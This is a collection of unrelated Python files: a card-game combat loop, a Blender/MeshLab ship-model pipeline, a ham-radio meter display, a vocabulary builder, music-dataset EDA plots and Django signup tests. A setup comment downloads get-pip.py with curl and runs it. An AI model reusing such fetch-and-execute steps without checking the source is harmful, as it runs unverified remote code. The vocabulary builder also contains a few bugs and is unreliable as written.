context.broadcast_combat_event(CardEvent(monster, EVENTS.SUMMON_COMBAT))
def get_index(self, card):
return self.board.index(card)
def attackers(self) -> List['Card']:
return [board_member for board_member in self.board if not board_member.dead and not board_member.cant_attack]
def fight_boards(war_party_1: 'WarParty', war_party_2: 'WarParty', randomizer: 'Randomizer'):
# Currently we are not randomizing the first to fight here
# Expect to pass half boards into fight_boards in random order i.e. by shuffling players in combat step
# Half boards are copies, the originals state cannot be changed in the combat step
logger.debug(f"{war_party_1.owner.name}'s board is {war_party_1.board}")
logger.debug(f"{war_party_2.owner.name}'s board is {war_party_2.board}")
attacking_war_party = war_party_1
defending_war_party = war_party_2
if war_party_2.num_cards() > war_party_1.num_cards():
attacking_war_party, defending_war_party = defending_war_party, attacking_war_party
start_combat_event = CardEvent(None, EVENTS.COMBAT_START)
# Friendly vs enemy warparty does not matter for broadcast_combat_event
CombatPhaseContext(war_party_1, war_party_2, randomizer).broadcast_combat_event(start_combat_event)
for _ in range(100):
attacker = attacking_war_party.find_next()
defender = defending_war_party.get_random_monster(randomizer)
logger.debug(f'{attacking_war_party.owner.name} is attacking {defending_war_party.owner.name}')
if not defender:
break
if attacker:
start_attack(attacker, defender, attacking_war_party, defending_war_party, randomizer)
elif not defending_war_party.attackers():
break
attacking_war_party, defending_war_party = defending_war_party, attacking_war_party
damage(war_party_1, war_party_2)
def damage(half_board_1: 'WarParty', half_board_2: 'WarParty'):
monster_damage_1 = sum([card.tier for card in half_board_1.board if not card.dead])
monster_damage_2 = sum([card.tier for card in half_board_2.board if not card.dead])
# Handle case where both players have cards left on board.
if monster_damage_1 > 0 and monster_damage_2 > 0:
logger.debug('neither player won (both players have minions left)')
elif monster_damage_1 > 0:
logger.debug(f'{half_board_1.owner.name} has won the fight')
half_board_2.owner.health -= monster_damage_1 + half_board_1.owner.tavern_tier
elif monster_damage_2 > 0:
logger.debug(f'{half_board_2.owner.name} has won the fight')
half_board_1.owner.health -= monster_damage_2 + half_board_2.owner.tavern_tier
else:
logger.debug('neither player won (no minions left)')
def start_attack(attacker: 'MonsterCard', defender: 'MonsterCard', attacking_war_party: 'WarParty', defending_war_party: 'WarParty',
randomizer: 'Randomizer'):
logger.debug(f'{attacker} is attacking {defender}')
on_attack_event = CardEvent(attacker, EVENTS.ON_ATTACK)
combat_phase_context = CombatPhaseContext(attacking_war_party, defending_war_party, randomizer)
combat_phase_context.broadcast_combat_event(on_attack_event)
attacker.take_damage(defender.attack, combat_phase_context)
defender.take_damage(attacker.attack, combat_phase_context)
# handle "after combat" events here
combat_phase_context.broadcast_combat_event(CardEvent(attacker, EVENTS.AFTER_ATTACK))
attacker.resolve_death(CombatPhaseContext(attacking_war_party, defending_war_party, randomizer))
defender.resolve_death(CombatPhaseContext(defending_war_party, attacking_war_party, randomizer))
logger.debug(f'{attacker} has just attacked {defender}')
|
#!/usr/bin/env python3
#
# Plan 1: Automated ship model download and processing
# 1) Download Fleet VieweR Star Citizen Ships 3D Models - Data as csv
# 2) For each "Download Model Path Remote"
# 2.1) Download .ctm file
# 2.2) Read MeshLab settings and determine which "original_to_LOD0.mlx" to use
# 2.3) meshlabserver.exe -i filename.ctm -o filename_fv_LOD0.obj -s original_to_LOD0.mlx
# Transform: Scale, Normalize: Scale to Unit bbox true
# Remove Duplicate Vertices
# Remove Unreferenced Vertices
# Re-Compute Face Normals
# [Optional] Invert Faces Orientation
# 2.4) meshlabserver.exe -i filename_fv_LOD0.obj -o filename_fv_LOD1.obj -s LOD0_to_LOD1.mlx
# Ambient Occlusion
# Select by Vertext Quality: min:0, max:0.0001
# Delete Selected Faces
# Remove Unreferenced Vertices
# 3)
#
#
# Requires MeshLab installed
# http://www.meshlab.net/#download
#
# Required Blender Setup:
# cd /your/path/to/blender/python/bin
# curl -O https://bootstrap.pypa.io/get-pip.py
# chmod +x get-pip.py
# ./python3.5m get-pip.py
# ./python3.5m pip install requests
# ./python3.5m pip install cachecontrol
# ./python3.5m pip install lockfile
#
spreadsheetId = '1ammOh0-6BHe2hYFQ5c1pdYrLlNjVaphd5bDidcdWqRo'
sheetId = 0
FIELD_MODEL_PATH_REMOTE = 'Model Path Remote'
FIELD_MESHLAB_FORWARD_UP_NORMAL = 'MeshLab\nForward_Up_Normal'
MESHLABSERVER_EXE = 'c:\\Program Files\\VCG\\MeshLab\\meshlabserver.exe'
# MacOS required hack:
# $ cd /Applications/meshlab.app/Contents/MacOS/
# $ install_name_tool -add_rpath "@executable_path/../Frameworks" meshlabserver
#MESHLABSERVER_EXE = '/Applications/meshlab.app/Contents/MacOS/meshlabserver'
import bpy
import csv
import io
import os
import subprocess
import time
import requests
from cachecontrol import CacheControl
from cachecontrol.caches.file_cache import FileCache
def execute(cmd_args, cwd=None):
print('execute(%r)' % cmd_args)
with subprocess.Popen(cmd_args, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
output, errors = p.communicate()
print(output.decode("utf-8"))
return p.returncode
class RsiCtmToLods:
def setLayers(self, scene, obj, *indices):
obj.layers = [ i in indices for i in range(len(obj.layers)) ]
def decimate(self, scene, obj, ratio):
if obj.type != "MESH":
return
modDec = obj.modifiers.new("Decimate", type = "DECIMATE")
modDec.ratio = ratio
scene.update()
def selectLayers(self, scene, layers):
for i in range(len(scene.layers)):
scene.layers[i] = layers[i]
def selectObject(self, scene, obj):
for obj2 in scene.objects:
obj2.select = obj2 == obj
def getSession(self):
return CacheControl(requests.session(), cache=FileCache('.cache'))
def importAndProcessAll(self):
session = self.getSession()
response = session.get('https://docs.google.com/spreadsheets/d/%s/export?gid=%d&format=csv' % (spreadsheetId, sheetId))
response.raise_for_status()
#print(response.content)
processed = []
with io.StringIO(response.text) as buff:
rows = csv.DictReader(buff)
for row in rows:
#print(row)
pathRemote = row[FIELD_MODEL_PATH_REMOTE]
print(' pathRemote:%r' % pathRemote)
meshlabForwardUpNormal = row[FIELD_MESHLAB_FORWARD_UP_NORMAL]
if not meshlabForwardUpNormal:
meshlabForwardUpNormal = 'nZ_pY_Normal'
print(' meshlabForwardUpNormal:%r' % meshlabForwardUpNormal)
if not pathRemote or pathRemote in processed:
continue
self.importAndProcess(session, pathRemote, meshlabForwardUpNormal)
processed.append(pathRemote)
#break
def importAndProcess(self, session, pathRemote, meshlabForwardUpNormal):
if not session:
session = self.getSession()
if not meshlabForwardUpNormal:
meshlabForwardUpNormal = 'nZ_pY_Normal'
print(' meshlabForwardUpNormal:%r' % meshlabForwardUpNormal)
self.downloadCtm(session, pathRemote)
filename_ctm = os.path.split(pathRemote)[1]
filename = os.path.splitext(filename_ctm)[0]
self.meshlabProcessCtmToObj(filename, meshlabForwardUpNormal)
self.blenderProcessObj(filename)
self.blenderExportScene()
def downloadCtm(self, session, pathRemote):
print("Downloading %r" % pathRemote)
filename_ctm = os.path.split(pathRemote)[1]
filename = os.path.splitext(filename_ctm)[0]
# TODO:(pv) Don't bother downloading or processing if response.status == 304
response = session.get(pathRemote, stream=True)
print('response.status_code:%d' % response.status_code)
response.raise_for_status()
with open(filename_ctm, 'wb') as handle:
for block in response.iter_content(chunk_size=1024):
if block:
print(".", end="")
handle.write(block)
handle.flush()
print("")
def meshlabProcessCtmToObj(self, filename, meshlabForwardUpNormal):
print("%r MeshLab CTM to OBJ" % filename)
#
# TODO:(pv) Consider using https://github.com/3DLIRIOUS/MeshLabXML
#
filename_ctm = filename + ".ctm"
meshlab_script = 'LOD0_%s.mlx' % meshlabForwardUpNormal
filename_lod0_obj = filename + '_fv_LOD0.obj'
cmd_args = [MESHLABSERVER_EXE, "-i", filename_ctm, "-o", filename_lod0_obj, '-s', meshlab_script]
execute(cmd_args)
meshlab_script = 'LOD1.mlx'
filename_lod1_obj = filename + '_fv_LOD1.obj'
cmd_args = [MESHLABSERVER_EXE, "-i", filename_lod0_obj, "-o", filename_lod1_obj, '-s', meshlab_script]
execute(cmd_args)
def blenderProcessObj(self, filename):
print("%r Blender OBJ LODs" % filename)
bpy.ops.wm.read_homefile(use_empty=True)
scene = bpy.context.scene
obj_lod0 = self.loadAndSetLodRatio(scene, filename, 0, None)
obj_lod1 = self.loadAndSetLodRatio(scene, filename, 1, 0.90)
obj_lod2 = self.copyAndSetLodRatio(scene, obj_lod1, 2, 0.60)
obj_lod3 = self.copyAndSetLodRatio(scene, obj_lod1, 3, 0.30)
obj_lod4 = self.copyAndSetLodRatio(scene, obj_lod1, 4, 0.10)
obj_lod5 = self.copyAndSetLodRatio(scene, obj_lod1, 5, 0.05)
bpy.ops.wm.save_as_mainfile(filepath=filename + ".blend", check_existing=False)
def loadAndSetLodRatio(self, scene, filename, lod, ratio):
obj_lodX_name = filename + "_fv_LOD%d" % lod
filename_lodX = obj_lodX_name + ".obj"
print("Blender Load %r " % filename_lodX)
#
# https://docs.blender.org/api/current/bpy.ops.import_scene.html#bpy.ops.import_scene.obj
#
bpy.ops.import_scene.obj(filepath=filename_lodX)
obj_lodX = scene.objects[obj_lodX_name]
self.setLayers(scene, obj_lodX, lod)
if ratio:
self.decimate(scene, obj_lodX, ratio)
return obj_lodX
def copyAndSetLodRatio(self, scene, obj, lod, ratio):
obj_lodX_name = obj.name[:obj.name.rfind("_fv_LOD")] + "_fv_LOD%d" % lod
print("Blender Create %r " % obj_lodX_name)
obj_lodX = obj.copy()
obj_lodX.data = obj.data.copy()
obj_lodX.animation_data_clear()
scene.objects.link(obj_lodX)
obj_lodX.name = obj_lodX_name
obj_lodX.data.name = obj_lodX_name
self.setLayers(scene, obj_lodX, lod)
self.decimate(scene, obj_lodX, ratio)
return obj_lodX
def blenderExportScene(self, scene=None):
if not scene:
scene = bpy.context.scene
for obj in scene.objects:
self.blenderExportObject(obj, scene)
def blenderExportName(self, name, scene=None):
if not scene:
scene = bpy.context.scene
self.blenderExportObject(scene.objects[name], scene)
def blenderExportObject(self, obj, scene=None):
if not scene:
scene = bpy.context.scene
print("Blender Export %r" % obj.name)
self.selectLayers(scene, obj.layers)
self.selectObject(scene, obj)
blend_file_dir = os.path.dirname(bpy.data.filepath)
filepath = os.path.join(blend_file_dir, obj.name)
#
# https://docs.blender.org/api/current/bpy.ops.export_scene.html#bpy.ops.export_scene.obj
#
bpy.ops.export_scene.obj(filepath=filepath + ".obj", check_existing=False, use_selection=True)
self.obj2ctm(filepath)
def obj2ctm(self, filepath):
print("Export %r to CTM" % filepath)
if True:
#
# Requires MeshLab installed
# http://www.meshlab.net/#download
#
# This seems like a win/win that produces the best quality output *AND* smallest files
#
cwd = os.path.dirname(filepath) or None
filename = os.path.split(filepath)[1]
filename_obj = filename + ".obj"
filename_ctm = filename + ".ctm"
cmd_args = [MESHLABSERVER_EXE, "-i", filename_obj, "-o", filename_ctm]
execute(cmd_args, cwd=cwd)
else:
filepath_obj = filepath + ".obj"
filepath_ctm = filepath + ".ctm"
if True:
#
# Requires OpenCTM SDK installed
# http://openctm.sourceforge.net/?page=download
# https://sourceforge.net/projects/openctm/files/OpenCTM-1.0.3/OpenCTM-1.0.3-setup.exe/download
#
# ERROR: The output of this command looks horrible in Unity!
#
cmd_args = ["ctmconv", filepath_obj, filepath_ctm, "--method", "MG1", "--level", "6"]
execute(cmd_args)
else:
#
# Requires special 64-bit build of openctm.dll placed in Blender home directory
# https://sourceforge.net/projects/openctm/files/
# https://sourceforge.net/projects/openctm/files/OpenCTM-1.0.3/OpenCTM-1.0.3-src.zip/download
#
# ERROR: Can't get this to work
#
filepath_obj = ctypes.c_char_p(filepath_obj.encode("utf-8"))
filepath_ctm = ctypes.c_char_p(filepath_ctm.encode("utf-8"))
try:
ctmIn = ctmNewContext(CTM_IMPORT)
ctmLoad(ctmIn, filepath_obj)
vertCount = ctmGetInteger(ctmIn, CTM_VERTEX_COUNT)
verts = ctmGetFloatArray(ctmIn, CTM_VERTICES)
triCount = ctmGetInteger(ctmIn, CTM_TRIANGLE_COUNT)
indices = ctmGetIntegerArray(ctmIn, CTM_INDICES)
finally:
ctmFreeContext(ctmIn)
try:
ctmOut = ctmNewContext(CTM_EXPORT)
ctmDefineMesh(ctmOut, verts, vertCount, indices, triCount, None)
ctmCompressionMethod(ctmOut, CTM_METHOD_MG1)
#ctmCompressionLevel(ctmOut, 9)
ctmSave(ctmOut, filepath_ctm)
finally:
ctmFreeContext(ctmOut)
def main():
rsiCtmToLods = RsiCtmToLods()
rsiCtmToLods.importAndProcessAll()
#rsiCtmToLods.importAndProcess(None, "https://robertsspaceindustries.com/media/4qayc3taiskh3r/source/CNOU_PIONEER.ctm", None)
if __name__ == '__main__':
main()
|
<filename>ham_tools/cli/rig_meters.py
"""
Display meters from rigctl
Assumes rigctld is listening on localhost
"""
import os
import shutil
import socket
import sys
import time
from dataclasses import dataclass
from colorama import Cursor, Fore, Style
from colorama.ansi import clear_screen as ansi_clear_screen
RIGCTLD_PORT = 4532
# Note: It usually takes 0.1 - 0.27 seconds to read four meters
INTERVAL_S = 0.5
# Over how many seconds to calculate the max value
MAX_HOLD_TIME = 2.0
# How many samples to hold on to for calculating the max over the last 1 second
MAX_SAMPLES = int(MAX_HOLD_TIME / INTERVAL_S)
# Width of the meter in characters
METER_WIDTH = 50
@dataclass
class Meter:
name: str
min_val: float
max_val: float
unit: str
def scale_value(self, value: float) -> int:
"""
Scale a value from its original range, as defined by the Meter object, to [0, 100]
"""
scaled = (value - self.min_val) / (self.max_val - self.min_val) * 100
return int(scaled)
# available meters can be found with the command:
# rigctl -r localhost get_level \?
METERS = {
"STRENGTH": Meter("STRENGTH", -54, 60, "dB"),
"ALC": Meter("ALC", 0.05, 0.6, ""),
"SWR": Meter("SWR", 1, 3, ""),
"RFPOWER_METER_WATTS": Meter("RFPOWER_METER_WATTS", 0, 100, "W"),
}
def main() -> None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", RIGCTLD_PORT))
samples: dict[str, list[float]] = {name: [] for name in METERS.keys()}
last_term_size = None
while True:
results = []
start = time.time()
# Clear the screen on startup and if the terminal size changes
term_size = shutil.get_terminal_size()
if term_size != last_term_size:
clear_screen()
last_term_size = term_size
for meter in METERS.values():
sock.send(f"\\get_level {meter.name}\n".encode())
try:
raw_val = float(sock.recv(32).strip())
except Exception as e:
raise RuntimeError(f"Unable to read meters from rigctld: {e}")
# Get the max value over the last samples
samples[meter.name].append(raw_val)
if len(samples[meter.name]) > MAX_SAMPLES:
samples[meter.name].pop(0)
max_val = max(samples[meter.name])
results.append(
(
meter,
raw_val,
max_val,
meter.scale_value(raw_val),
meter.scale_value(max_val),
)
)
end = time.time()
print_meters(results)
to_sleep = INTERVAL_S - (end - start)
if to_sleep < 0:
to_sleep = 0
time.sleep(to_sleep)
def print_meters(results: list[tuple[Meter, float, float, int, int]]) -> None:
lines = []
for meter, raw_val, max_val, scaled_val, scaled_max in results:
if scaled_val < 0:
scaled_val = 0
elif scaled_val > 100:
scaled_val = 100
scaling_factor = 100 / METER_WIDTH
scaled_val = int(scaled_val / scaling_factor)
scaled_max = int(scaled_max / scaling_factor)
lines.append(meter.name)
inner_meter = ""
for i in range(METER_WIDTH):
if i == scaled_max and scaled_val < scaled_max:
inner_meter += "|"
elif i <= scaled_val:
inner_meter += "#"
else:
inner_meter += " "
meter_str = f"[{inner_meter}] "
# Make the meter value red if it's over the max val, e.g. a SWR too high
if raw_val >= meter.max_val:
meter_str += Fore.RED
meter_str += f"{raw_val:0.2f}"
meter_str += Style.RESET_ALL
if meter.unit:
meter_str += f" {meter.unit}"
meter_str += f" (max: {max_val:0.2f}"
if meter.unit:
meter_str += f" {meter.unit}"
meter_str += ")"
# Add a few spaces at the end to clear out any junk, like if our meter_str line
# got shorter from shorter values
meter_str += 5 * " "
lines.append(meter_str)
print(Cursor.POS()) # move cursor to 0,0
for line in lines:
print(line)
def clear_screen() -> None:
"""
Clear the screen in a platform-independent way, since colorama doesn't support win32
for this.
"""
if sys.platform == "win32":
os.system("cls")
else:
print(ansi_clear_screen())
if __name__ == "__main__":
main()
|
'''build vocab from tokenized corpors'''
import numpy as np
from collections import defaultdict
from .. import LOGGER
class VocabBuilder:
"""
TODO:
- save the vocab given the output vocab filename
- prun the vacab if does not fit max_vocab_size
"""
def __init__(self, min_freq, subsample_rate=None):
self.min_freq = min_freq
self.subsample_rate = subsample_rate
self.token_to_id = dict()
self.token_arr = list()
self.freq_arr = list()
self.prob_arr = list()
self.vacab_size = 0
self.min_reduce = 1
def _prepare_token_freq_table(self, tokenized_corpus):
LOGGER.info("Build token frequency table")
nr_tokens, min_reduce = 0, 1
token_freq_table = defaultdict(int)
id_sentence = 0
for sentence in tokenized_corpus:
if id_sentence % 10000 == 0:
LOGGER.info(
"PROGRESS: #%i tokenized_corpus, %i words, keeping %i word types",
id_sentence, nr_tokens, len(token_freq_table)
)
for token in sentence:
token_freq_table[token] += 1
nr_tokens += len(sentence)
id_sentence += 1
# TODO:
# if self.max_vocab_size and len(token_freq_table) > self.max_vocab_size:
# reduce_vocab(token_table, min_reduce)
# min_reduce += 1
nr_tokenized_corpus = id_sentence + 1 if tokenized_corpus else 0
LOGGER.info("in total %s tokens from %s tokenized_corpus", nr_tokens, nr_tokenized_corpus)
return token_freq_table
def _filter_on_freq(self, token_freq_table, min_freq=None):
"""
prepare the vacab table:
- drop tokens with frequency < min_freq
- sort it to descending order
"""
if min_freq is None:
min_freq = self.min_freq
nr_kept_tokens, kept_vocab = 0, dict()
for token, freq in token_freq_table.items():
if freq >= min_freq:
kept_vocab[token] = freq
nr_kept_tokens += freq
kept_vocab_size = len(kept_vocab)
full_vocab_size = len(token_freq_table)
kept_vocab_pct = kept_vocab_size * 100 / max(full_vocab_size, 1)
LOGGER.info("kept %s uniq tokens from %s all uniq tokens, or %s%% kept",
kept_vocab_size, full_vocab_size, round(kept_vocab_pct, 2))
nr_total_tokens = sum(token_freq_table.values())
kept_token_pct = nr_kept_tokens * 100 / max(nr_total_tokens, 1)
LOGGER.info("kept %s tokens from %s tokens, or %s%% kept",
nr_kept_tokens, nr_total_tokens, round(kept_token_pct, 2))
return kept_vocab_size, kept_vocab
def _compute_subsampling_prob(self, subsample_rate=None):
nr_total_tokens = sum(self.freq_arr)
nr_uniq_tokens = len(self.token_arr)
if subsample_rate is None:
subsample_rate = self.subsample_rate
if not subsample_rate:
# no words downsampled
threshold_count = nr_total_tokens
elif subsample_rate < 1.0:
# set parameter as proportion of total
# compitible to word2vec implementation
threshold_count = subsample_rate * nr_total_tokens
else:
# sample >= 1: downsample all words with higher count than sample
# compitible to gensim implementation
threshold_count = int(subsample_rate * (3 + np.sqrt(5)) / 2)
downsample_total, downsample_unique = 0, 0
self.prob_arr = list()
for token_id in range(nr_uniq_tokens):
token = self.token_arr[token_id]
freq = self.freq_arr[token_id]
token_probability = (np.sqrt(freq / threshold_count) + 1) * (threshold_count / freq)
if token_probability < 1.0:
downsample_unique += 1
downsample_total += token_probability * freq
else:
token_probability = 1.0
downsample_total += freq
self.prob_arr.append(token_probability)
def _sort_by_descending_freq(self, vocab_freq):
if not vocab_freq:
return vocab_freq
return sorted(vocab_freq, key=lambda ele:vocab_freq[ele], reverse=True)
def build_vocab(self, corpus):
"""
Build vocabulary from a sequence of token list.
Params:
-------
tokenized_corpus: a list of token list
[[token_1, token_2, ...], [token_i, token_i+1], ...]
"""
token_freq_table = self._prepare_token_freq_table(corpus)
self.vocab_size, vocab_table = self._filter_on_freq(token_freq_table)
self.token_arr = self._sort_by_descending_freq(vocab_table)
self.freq_arr = [vocab_table[token] for token in self.token_arr]
vocab_table = None
self.token_to_id = {
token: token_id
for token_id, token in
enumerate(token_arr)
}
# compute probabilities from frequencies
self._compute_subsampling_prob()
# no Hierarchical Softmax for now
# if self.hs:
# # add info about each word's Huffman encoding
# self.create_binary_tree()
|
<filename>eda.py
"""Exploratory Data Analysis on WSDM Dataset with visualization.
Author: DHSong
Last Modified At: 2020.07.05
Exploratory Data Analysis on WSDM Dataset with visualization.
"""
import os
import pandas as pd
import matplotlib.font_manager as fm
import matplotlib.pyplot as plt
import seaborn as sns
class EDAWorker:
"""Worker for EDA.
Worker for EDA.
Attributes:
train_raw: pandas Dataframe for Train Dataset(train.csv).
test_raw: pandas Dataframe for Train Dataset(test.csv).
sample_submission_raw: pandas Dataframe for Submission Dataset(sample_submission.csv).
songs_raw: pandas Dataframe for Song Dataset(songs.csv).
members_raw: pandas Dataframe for Member Dataset(members.csv).
song_extra_info_raw: pandas Dataframe for Additional Song Dataset(song_extra_info.csv).
"""
def __init__(self, data_dirname='./data', font_path='./static/fonts/D2Coding.ttc'):
"""Inits Dataframe for data in data directory."""
self._matplotlib_setting(font_path)
self.train_raw = pd.read_csv(os.path.join(data_dirname, 'train.csv'))
self.test_raw = pd.read_csv(os.path.join(data_dirname, 'test.csv'))
self.sample_submission_raw = pd.read_csv(os.path.join(data_dirname, 'sample_submission.csv'))
self.songs_raw = pd.read_csv(os.path.join(data_dirname, 'songs.csv'))
self.members_raw = pd.read_csv(os.path.join(data_dirname, 'members.csv'))
self.song_extra_info_raw = pd.read_csv(os.path.join(data_dirname, 'song_extra_info.csv'))
def _matplotlib_setting(self, font_path):
"""set matplotlib fonts and style."""
font_family = fm.FontProperties(fname=font_path).get_name()
plt.rcParams['font.family'] = font_family
plt.rcParams['font.size'] = 14
plt.style.use('seaborn-darkgrid')
def barplot_train_column_by_target(self, column, horizontal=True):
"""Draw barplot.
Draw barplot about columns in train dataset. Visualize distributions of column data based on target value.
Arags:
column: str type. Which column in train dataset to be plotted.
horizontal: bool type. wheter the plot is horizontal or not.
Return:
"""
assert column in self.train_raw.columns
plt.figure(figsize=(16, 9))
if horizontal:
sns.countplot(y=column, hue='target', data=self.train_raw, order=self.train_raw[column].value_counts().index)
else:
sns.countplot(x=column, hue='target', data=self.train_raw, order=self.train_raw[column].value_counts().index)
plt.title('{} Distribution by target'.format(column))
plt.legend(loc='upper right')
plt.savefig('./figures/barplot_train_column_by_target-{}'.format(column))
def barplot_members_column(self, column, horizontal=True):
"""Draw barplot.
Draw barplot about columns in members dataset. Visualize distributions of column data.
Arags:
column: str type. Which column in members dataset to be plotted.
horizontal: bool type. wheter the plot is horizontal or not.
Return:
"""
assert column in self.members_raw.columns
plt.figure(figsize=(16, 9))
if horizontal:
sns.countplot(y=column, data=self.members_raw, order=self.members_raw[column].value_counts().index)
else:
sns.countplot(x=column, data=self.members_raw, order=self.members_raw[column].value_counts().index)
plt.title('{} Distribution'.format(column))
plt.savefig('./figures/barplot_members_column-{}'.format(column))
def barplot_members_column_by_target(self, column, horizontal=True):
"""Draw barplot.
Draw barplot about columns in members dataset. Visualize distributions of column data based on traget value.
Arags:
column: str type. Which column in members dataset to be plotted.
horizontal: bool type. wheter the plot is horizontal or not.
Return:
"""
assert column in self.members_raw.columns
members_train = pd.merge(left=self.members_raw, right=self.train_raw, how='inner', on='msno')
plt.figure(figsize=(16, 9))
if horizontal:
sns.countplot(y=column, hue='target', data=members_train, order=self.members_raw[column].value_counts().index)
else:
sns.countplot(x=column, hue='target', data=members_train, order=self.members_raw[column].value_counts().index)
plt.title('{} Distribution by target'.format(column))
plt.legend(loc='upper right')
plt.savefig('./figures/barplot_members_column_by_target-{}'.format(column))
def kdeplot_members_column(self, column):
"""Draw kdeplot.
Draw kdeplot about columns in members dataset. Visualize distributions of column data.
Arags:
column: str type. Which column in members dataset to be plotted.
Return:
"""
assert column in self.members_raw.columns
plt.figure(figsize=(16, 9))
sns.kdeplot(self.members_raw[column], shade=True)
plt.title('{} Distribution by target'.format(column))
plt.savefig('./figures/kdeplot_members_column-{}'.format(column))
def kdeplot_members_column_by_target(self, column):
"""Draw kdeplot.
Draw kdeplot about columns in members dataset. Visualize distributions of column data based on target value.
Arags:
column: str type. Which column in members dataset to be plotted.
Return:
"""
assert column in self.members_raw.columns
members_train = pd.merge(left=self.members_raw, right=self.train_raw, how='inner', on='msno')
plt.figure(figsize=(16, 9))
sns.kdeplot(members_train.loc[members_train.target == 0, column], shade=True, label='0')
sns.kdeplot(members_train.loc[members_train.target == 1, column], shade=True, label='1')
plt.title('{} Distribution by target'.format(column))
plt.legend(loc='upper right')
plt.savefig('./figures/kdeplot_members_column_by_target-{}'.format(column))
def barplot_songs_column(self, column, horizontal=True):
"""Draw barplot.
Draw barplot about columns in songs dataset. Visualize distributions of column data.
Arags:
column: str type. Which column in songs dataset to be plotted.
horizontal: bool type. wheter the plot is horizontal or not.
Return:
"""
assert column in self.songs_raw.columns
plt.figure(figsize=(16, 9))
if horizontal:
sns.countplot(y=column, data=self.songs_raw, order=self.songs_raw[column].value_counts().index)
else:
sns.countplot(x=column, data=self.songs_raw, order=self.songs_raw[column].value_counts().index)
plt.title('{} Distribution'.format(column))
plt.savefig('./figures/barplot_songs_column-{}'.format(column))
def barplot_songs_column_by_target(self, column, horizontal=True):
"""Draw barplot.
Draw barplot about columns in songs dataset. Visualize distributions of column data based on traget value.
Arags:
column: str type. Which column in songs dataset to be plotted.
horizontal: bool type. wheter the plot is horizontal or not.
Return:
"""
assert column in self.songs_raw.columns
songs_train = pd.merge(left=self.songs_raw, right=self.train_raw, how='inner', on='song_id')
plt.figure(figsize=(16, 9))
if horizontal:
sns.countplot(y=column, hue='target', data=songs_train, order=self.songs_raw[column].value_counts().index)
else:
sns.countplot(x=column, hue='target', data=songs_train, order=self.songs_raw[column].value_counts().index)
plt.title('{} Distribution by target'.format(column))
plt.legend(loc='upper right')
plt.savefig('./figures/barplot_songs_column_by_target-{}'.format(column))
def kdeplot_songs_column(self, column):
"""Draw kdeplot.
Draw kdeplot about columns in songs dataset. Visualize distributions of column data.
Arags:
column: str type. Which column in songs dataset to be plotted.
Return:
"""
assert column in self.songs_raw.columns
plt.figure(figsize=(16, 9))
sns.kdeplot(self.songs_raw[column], shade=True)
plt.title('{} Distribution by target'.format(column))
plt.savefig('./figures/kdeplot_songs_column-{}'.format(column))
def kdeplot_songs_column_by_target(self, column):
"""Draw kdeplot.
Draw kdeplot about columns in songs dataset. Visualize distributions of column data based on target value.
Arags:
column: str type. Which column in songs dataset to be plotted.
Return:
"""
assert column in self.songs_raw.columns
songs_train = pd.merge(left=self.songs_raw, right=self.train_raw, how='inner', on='song_id')
plt.figure(figsize=(16, 9))
sns.kdeplot(songs_train.loc[songs_train.target == 0, column], shade=True, label='0')
sns.kdeplot(songs_train.loc[songs_train.target == 1, column], shade=True, label='1')
plt.title('{} Distribution by target'.format(column))
plt.legend(loc='upper right')
plt.savefig('./figures/kdeplot_songs_column_by_target-{}'.format(column))
if __name__ == '__main__':
worker = EDAWorker(data_dirname='./data', font_path='./static/fonts/D2Coding.ttc')
print('Train Dataset Shape: {}'.format(worker.train_raw.shape))
print('Test Dataset Shape: {}'.format(worker.test_raw.shape))
print('\n*********Train Dataset Missing Values*********')
print(worker.train_raw.isna().sum())
print()
worker.barplot_train_column_by_target('source_system_tab')
worker.barplot_train_column_by_target('source_screen_name')
worker.barplot_train_column_by_target('source_type')
print('\n*********Members Dataset Missing Values*********')
print(worker.members_raw.isna().sum())
print()
worker.barplot_members_column_by_target('city')
worker.barplot_members_column_by_target('gender', horizontal=False)
worker.barplot_members_column_by_target('registered_via', horizontal=False)
worker.barplot_members_column('registered_via', horizontal=False)
worker.kdeplot_members_column('bd')
worker.kdeplot_members_column_by_target('bd')
print('\n*********Songs Dataset Missing Values*********')
print(worker.songs_raw.isna().sum())
print()
worker.barplot_songs_column_by_target('language')
worker.barplot_songs_column('language')
worker.kdeplot_songs_column('song_length')
worker.kdeplot_songs_column_by_target('song_length')
|
#
# Copyright 2019 Altran. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
"""
User/scf user api test cases
"""
from django.core.urlresolvers import reverse
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from ums.models import ScfUser
class UserRegistrationAPIViewTestCase(APITestCase):
""" user registration api test cases """
url = reverse('hav-signup')
def test_user_registration(self):
"""
Test to verify that a post call with user valid data
"""
user_data = {
"email": "<EMAIL>",
"username": "<EMAIL>",
"password": "<PASSWORD>",
"first_name": "first_name",
"last_name": "last_name"
}
response = self.client.post(self.url, user_data)
self.assertEqual(200, response.status_code)
self.assertTrue("token" in response.data)
def test_unique_username_validation(self):
"""
Test to verify that a post call with already exists username
"""
user_data_1 = {
"email": "<EMAIL>",
"username": "<EMAIL>",
"password": "<PASSWORD>",
"first_name": "first_name",
"last_name": "last_name"
}
response = self.client.post(self.url, user_data_1)
self.assertEqual(200, response.status_code)
user_data_2 = {
"email": "<EMAIL>",
"username": "<EMAIL>",
"password": "<PASSWORD>",
"first_name": "first_name",
"last_name": "last_name"
}
response = self.client.post(self.url, user_data_2)
self.assertEqual(400, response.status_code)
def test_email_username_validation(self):
"""
Test to verify that a post call with already exists email
"""
user_data_1 = {
"email": "<EMAIL>",
"username": "<EMAIL>",
"password": "<PASSWORD>",
"first_name": "first_name",
"last_name": "last_name"
}
response = self.client.post(self.url, user_data_1)
self.assertEqual(200, response.status_code)
user_data_2 = {
"email": "<EMAIL>",
"username": "<EMAIL>",
"password": "<PASSWORD>",
"first_name": "first_name",
"last_name": "last_name"
}
response = self.client.post(self.url, user_data_2)
self.assertEqual(400, response.status_code)
class UserLoginAPIViewTestCase(APITestCase):
""" user login api test cases """
url = reverse("hav-login")
def setUp(self):
""" initialized setup data"""
self.username = "ranvijay"
self.email = "<EMAIL>"
self.password = "<PASSWORD>"
